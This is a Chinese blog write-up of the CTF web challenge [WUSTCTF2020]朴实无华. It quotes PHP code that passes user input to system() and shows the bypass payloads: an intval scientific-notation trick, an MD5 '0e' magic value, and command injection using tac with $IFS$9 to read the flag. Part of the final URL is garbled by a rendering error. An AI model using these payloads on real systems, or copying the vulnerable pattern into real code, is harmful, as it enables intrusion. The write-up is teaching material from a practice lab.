[WUSTCTF2020]朴实无华

最新推荐文章于 2024-11-10 18:53:38 发布
原创 最新推荐文章于 2024-11-10 18:53:38 发布 · 2.3k 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#php #web #网络安全 #安全

本文记录了一名参赛者在WUSTCTF2020中逐步破解谜题的过程,从发现乱码到逐层绕过安全检查,展现了技术与策略的结合,最终揭示flag的故事。

[WUSTCTF2020]朴实无华

隔了几天了,继续刷题,在这里插入图片描述一上来就叫我hack他这不好吧,看看有没有下手点在这里插入图片描述
发现了乱码,改一下文字编码,在标签栏右击打开显示菜单栏>文字编码>自动在这里插入图片描述
bot?bot?bot?!robots!!,好吧robots.txt这个我是工具扫出来的,我的做法确实zz了,看一下吧在这里插入图片描述访问该页面,在这里插入图片描述
好家伙,fake!想起开始的提示header,抓个包看看在这里插入图片描述访问fl4g.php在这里插入图片描述好家伙,让我去非洲哇

<?php
header('Content-type:text/html;charset=utf-8');
error_reporting(0);
highlight_file(__file__);


//level 1
if (isset($_GET['num'])){
    $num = $_GET['num'];
    if(intval($num) < 2020 && intval($num + 1) > 2021){
        echo "我不经意间看了看我的劳力士, 不是想看时间, 只是想不经意间, 让你知道我过得比你好.</br>";
    }else{
        die("金钱解决不了穷人的本质问题");
    }
}else{
    die("去非洲吧");
}
//level 2
if (isset($_GET['md5'])){
   $md5=$_GET['md5'];
   if ($md5==md5($md5))
       echo "想到这个CTFer拿到flag后, 感激涕零, 跑去东澜岸, 找一家餐厅, 把厨师轰出去, 自己炒两个拿手小菜, 倒一杯散装白酒, 致富有道, 别学小暴.</br>";
   else
       die("我赶紧喊来我的酒肉朋友, 他打了个电话, 把他一家安排到了非洲");
}else{
    die("去非洲吧");
}

//get flag
if (isset($_GET['get_flag'])){
    $get_flag = $_GET['get_flag'];
    if(!strstr($get_flag," ")){
        $get_flag = str_ireplace("cat", "wctf2020", $get_flag);
        echo "想到这里, 我充实而欣慰, 有钱人的快乐往往就是这么的朴实无华, 且枯燥.</br>";
        system($get_flag);
    }else{
        die("快到非洲了");
    }
}else{
    die("去非洲吧");
}
?>

看看源码,三层绕过才能逃离去非洲的命运,

//level 1
if (isset($_GET['num'])){
    $num = $_GET['num'];
    if(intval($num) < 2020 && intval($num + 1) > 2021){
        echo "我不经意间看了看我的劳力士, 不是想看时间, 只是想不经意间, 让你知道我过得比你好.</br>";
    }else{
        die("金钱解决不了穷人的本质问题");
    }
}else{
    die("去非洲吧");
}

传入一个参数num,经过intval函数既要小于2020并且加一要大于2021,看一下这个函数
intval() 函数用于获取变量的整数值。
intval() 函数通过使用指定的进制 base 转换(默认是十进制),返回变量 var 的 integer 数值。 intval() 不能用于 object,否则会产生 E_NOTICE 错误并返回 1。

在这里插入图片描述利用这个应该是可以绕过的,本地测试一下在这里插入图片描述在这里插入图片描述成功绕过,传入参数在这里插入图片描述诶?!变穷人啦?!后来猜测可能是传入num值后台会自动转成字符串,由于开启了error_reporting(0);,所以就算报错咱也不知道~
于是重新构造url:http://c7f76099-3fda-4868-95c7-00834079ab2f.node4.buuoj.cn/fl4g.php?num=2e4在这里插入图片描述欸嘿,劳力士有了,开始绕过第二关,炒我的拿手小菜

//level 2
if (isset($_GET['md5'])){
   $md5=$_GET['md5'];
   if ($md5==md5($md5))
       echo "想到这个CTFer拿到flag后, 感激涕零, 跑去东澜岸, 找一家餐厅, 把厨师轰出去, 自己炒两个拿手小菜, 倒一杯散装白酒, 致富有道, 别学小暴.</br>";
   else
       die("我赶紧喊来我的酒肉朋友, 他打了个电话, 把他一家安排到了非洲");
}else{
    die("去非洲吧");
}

get传入MD5要使加密前后==,百度一下:0e215962017在这里插入图片描述哦吼吼吼吼,flag在朝我招手了
第三关:

//get flag
if (isset($_GET['get_flag'])){
    $get_flag = $_GET['get_flag'];
    if(!strstr($get_flag," ")){
        $get_flag = str_ireplace("cat", "wctf2020", $get_flag);
        echo "想到这里, 我充实而欣慰, 有钱人的快乐往往就是这么的朴实无华, 且枯燥.</br>";
        system($get_flag);
    }else{
        die("快到非洲了");
    }
}else{
    die("去非洲吧");
}

传入的get_flag不能有空格
传入的cat会被替换为wctf2020
传入的get_flag会当作系统命令被执行
管他那么多先看一下当前目录下都有什么在这里插入图片描述我们的flag应该就在最长的那个文件里,读文件一般使用cat,但是cat会被替换,所以可以使用tac

另外一点就是,无论哪个命令,后面接一个文件都需要先空格,即tac fllllaaaag,但是这里根据逻辑不能填空格

解决方法,利用$IFSKaTeX parse error: Expected 'EOF', got '&' at position 137: …l4g.php?num=2e4&̲md5=0e215962017…IFS$9fllllllllllllllllllllllllllllllllllllllllaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaag

在这里插入图片描述我不经意间看了看我的劳力士, 不是想看时间, 只是想不经意间, 让你知道我过得比你好.
想到这个CTFer拿到flag后, 感激涕零, 跑去东澜岸, 找一家餐厅, 把厨师轰出去, 自己炒两个拿手小菜, 倒一杯散装白酒, 致富有道, 别学小暴.
想到这里, 我充实而欣慰, 有钱人的快乐往往就是这么的朴实无华, 且枯燥

WEB狗的各种绕过 —— 【WUST-CTF2020朴实无华
Ve99tr’s Blog
03-30 4814
web狗的各种绕过:intval函数绕过、双重MD5以及==弱类型、空格过滤绕过
buuctf-[WUSTCTF2020]朴实无华(小宇特详解)
小宇的web博客
02-23 2084
buuctf-[WUSTCTF2020]朴实无华(小宇特详解) 1.这里先看题目 2.然后去查看一下robots.txt,看一下爬虫规则。 3.提示是/fAke_f1agggg.php,这里访问并查看f12的网络 这里发现了/fl4g.php的提示,尝试访问 4.访问/fl4g.php,这里如果出现乱码问题请参考我的文章 (1条消息) 如何修复火狐浏览器的乱码问题(最新版)_小宇的web博客-优快云博客 <?php header('Content-type:text/html;charset=
命令执行 [WUSTCTF2020]朴实无华1
m0_75178803的博客
02-22 1268
isset()函数可以检测「变量是否存在」并非NULL。常用来判断变量是否被定义。
buu做题笔记——[WUSTCTF2020]朴实无华&[BSidesCF 2020]Had a bad day
weixin_46330722的博客
11-07 898
BUU[WUSTCTF2020]朴实无华robots.txtresponselevel 1level 2level 3[BSidesCF 2020]Had a bad day [WUSTCTF2020]朴实无华 robots.txt 进入题目界面就一个Hack me,抓包也没看到啥有用的。dirsearch开启 ! 扫一扫有没有什么有用的,但是全都429,只能手动扫描了。备份文件,git泄露,robots协议…全都试一遍 。终于在robots.txt里找到了有用的东西。 response 访问是一个有
WUST-CTF web-朴实无华 wp
qq_42188168的博客
03-30 619
<?php header('Content-type:text/html;charset=utf-8'); error_reporting(0); highlight_file(__file__); //level 1 if (isset($_GET['num'])){ $num = $_GET['num']; if(intval($num) < 2020 &am...
[WUSTCTF2020]朴实无华 ctf
wuyaowangchuan的博客
11-10 656
[WUSTCTF2020]朴实无华 知识点: intval函数 php MD5 弱比较 tac读取文件 ${IFS}空格绕过 进入环境 robots.txt里面有东西 进去这个文件 好家伙 假的flag 就在这个页面到处看看 响应头里面又有东西 访问 朴实无华,我知道题目为啥叫朴实无华了 接下来代码审计 我电脑的编码好像有问题,中文是乱码 不过问题不大 我去复制别人的 //level 1 if (isset($_GET['num'])){ $num = $_GET['num'];
[WUSTCTF 2020]朴实无华PHP 下的 intval 绕过技巧
两个月亮
09-29 4686
PHP7.2.5 以下的某个版本以前,intval() 函数无法正确解析字符 E 或 e,于是 intval 在解析到 E 或 e 时立即停止,这导致科学计数法实际并未生效。intval() 在 PHP7.2.5 及以上版本 中的表现符合预期,与我们对科学计数法的认知相符。intval() 函数 在 PHP7.2.5 以下的某个版本以前(仅测试了 PHP7.2.5 与 PHP7.0.0,PHP7.0.0 中,intval() 的表现存在异常,而在 PHP7.2.5 则表现正常。) 表现异常。
【buuctf】[WUSTCTF2020]spaceclub
2303_77121517的博客
11-10 790
flag奉上:wctf2020{h3re_1s_y0ur_fl@g_s1x_s1x_s1x}3.猜测是二进制数,将长的替换成1,短的替换成0。(先替换长的不然会将短的部分变为1)2.使用Sublime_Text打开选中发现了一堆点。4.使用python脚本转化为字符得到flag。1.打开下载的附件发现里面有内容但是被隐藏了。小白的第七天,日常记录WP。
[WUSTCTF 2020]朴实无华
最新发布
02-18
### WUSTCTF 2020 朴实无华 Challenge Details and Solutions #### 题目概述 WUSTCTF 2020 的 "朴实无华" 是一道涉及多个安全漏洞利用的 CTF 挑战,涵盖了 PHP 整数转换、SQL 注入以及命令注入等多个方面。该挑战...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值